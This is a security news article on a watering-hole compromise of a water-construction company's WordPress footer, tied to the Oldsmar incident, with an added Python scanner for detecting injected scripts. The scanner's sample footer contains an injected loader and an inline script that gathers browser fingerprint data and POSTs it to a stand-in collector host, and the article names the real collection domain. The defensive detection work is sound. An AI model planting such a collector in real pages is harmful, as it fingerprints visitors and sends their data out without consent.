Watering-Hole Attack Targeting Water Utilities Discovered
The Florida Water Plant Compromise Happened Hours After an Employee Accessed a Malicious Website.
Back in February, a hacker gained access to the water system of Oldsmar, Florida and tried to pump in a dangerous amount of sodium hydroxide (lye). Luckily, a worker spotted the change and reversed it.
Recently, researchers from security firm Dragos found that the WordPress website of a water infrastructure construction company in Florida was “hosting malicious code” in its footer file, placed where it would reach operators at water utilities in Florida and elsewhere. Over 1,000 end-user computers visited the site during the 58-day window in which it was infected.
Geolocation of US fingerprinted client computers
Image Source: Dragos
According to the report, on February 5 at 9:49 am ET, an employee for the city of Oldsmar visited the malicious website targeting water utilities. This was just hours before someone broke into the computer system for the city’s water treatment plant and tried to poison drinking water. Although the site likely played no role in the intrusion, the incident remains unsettling.
This is not a typical watering hole. We have medium confidence it did not directly compromise any organization. But it does represent an exposure risk to the water industry and highlights the importance of controlling access to untrusted websites, especially for Operational Technology (OT) and Industrial Control System (ICS) environments.
Watering-hole attacks have become increasingly common in campaigns that target specific industries or groups of users.
As explained in our cybersecurity glossary, in a watering-hole attack:
The threat actor spends time gathering strategic information about the target, observing which legitimate websites the members of the group visit most often. The attacker then exploits a vulnerability and infects one of those trusted websites with malware, without the knowledge of the site’s owner. Eventually, someone from that organization falls into the trap and gets their computer infected. This way, the attacker gains access to the target’s entire network.
Just as predators lie in wait near watering holes frequented by their prey, attackers compromise one or more websites used by the target group and plant malicious code tailored to those who visit them. These attacks work because website technologies, including the most popular platforms such as WordPress, continue to ship vulnerabilities, which makes stealthy compromise of legitimate sites easier than ever. According to Dragos, the site appeared to target water utilities, especially those in Florida.
The malicious code gathered more than 100 pieces of detailed information about each visitor, including OS and CPU type, browser and supported languages, geolocation services, time zone, video codecs, screen dimensions, browser plugins, touch points, input methods, and whether cameras, accelerometers, or microphones were present.
What’s more, visitors were redirected to two separate sites that collected cryptographic hashes that uniquely identified each connecting device and uploaded the fingerprints to a database hosted at bdatac.herokuapp[.]com.
Website compromised with a unique browser enumeration and fingerprinting script
Image Source: Dragos
The fingerprinting script drew on code from four different projects: core-js, UAParser, regeneratorRuntime, and a data-collection script observed on only two other websites, both of which are associated with a domain registration, hosting, and web development company.
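A defender-side check for the kind of footer injection described above. This is an added example, not Dragos’s code or anything from the compromised site: it scans an HTML fragment such as a WordPress footer for script tags that load from hosts outside the site’s own, and for inline scripts that both read several browser-fingerprinting APIs and reference a foreign host. The sample footer, the hostnames and the API list are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Browser APIs matching the data classes the report lists (OS/CPU, plugins,
# screen size, touch points, time zone, sensors). Two or more in one inline
# block together with a URL on a foreign host is treated as fingerprint-and-exfil.
FINGERPRINT_APIS = ("navigator.plugins", "navigator.platform", "hardwareConcurrency",
                    "screen.width", "maxTouchPoints", "getTimezoneOffset",
                    "enumerateDevices", "DeviceMotionEvent", "navigator.languages")
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)""", re.I)
EXTERNAL_URL_RE = re.compile(r"""https?://([^/'"\s]+)""")

def audit_footer(html, allowed_hosts):
    """Return (finding, host) tuples for scripts that do not belong to the site.

    Handles conventional <script> markup only; this is a first-pass integrity
    check for a theme file, not a parser for obfuscated HTML.
    """
    findings = []
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:                                      # external loader
            host = urlparse(src.group(1)).hostname   # None for same-origin relative paths
            if host and host not in allowed_hosts:
                findings.append(("external_script", host))
            continue
        api_hits = sum(api in body for api in FINGERPRINT_APIS)
        targets = {h for h in EXTERNAL_URL_RE.findall(body) if h not in allowed_hosts}
        if api_hits >= 2 and targets:                # collects fingerprint and talks off-site
            findings.append(("fingerprint_exfil", ",".join(sorted(targets))))
    return findings

# Constructed sample: a normal footer plus an injected loader and an inline collector.
SAMPLE_FOOTER = """<footer><p>&copy; Example Water Construction Co.</p></footer>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.example-bad.test/core.min.js"></script>
<script>var d = {p: navigator.platform, c: navigator.hardwareConcurrency,
  w: screen.width, t: navigator.maxTouchPoints, z: new Date().getTimezoneOffset()};
fetch("https://collector.example-bad.test/fp", {method: "POST", body: JSON.stringify(d)});
</script>"""

if __name__ == "__main__":
    for kind, host in audit_footer(SAMPLE_FOOTER, {"www.example-water.test"}):
        print(kind, host)
```

Run it against the footer and header templates of each theme after every update and diff the findings over time; a new external host appearing in a file that should not change is the signal to investigate.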
With the forensic information we collected so far, Dragos’s best assessment is that an actor deployed the watering hole on the water infrastructure construction company site to collect legitimate browser data for the purpose of improving the botnet malware’s ability to impersonate legitimate web browser activity. The botnet’s use of at least ten different cipher handshakes or JA3 hashes, some of which mimic legitimate browsers, compared to the widely published hash of a single handshake of a previous Tofsee bot iteration is evidence of botnet improvement.
Dragos was initially worried that the site posed a significant threat due to its:
- Focus on Florida;
- Association with the Oldsmar attack;
- Few code locations on the Internet;
- Similarity to watering-hole attacks by other ICS-targeting activity groups such as DYMALLOY, ALLANITE, and RASPITE.
Finally, the company doesn’t believe the site delivered any exploits or tried to gain unauthorized access to visiting computers. The discovery should, however, be a wake-up call.
At the time of writing, Oldsmar officials had not responded to a request for comment.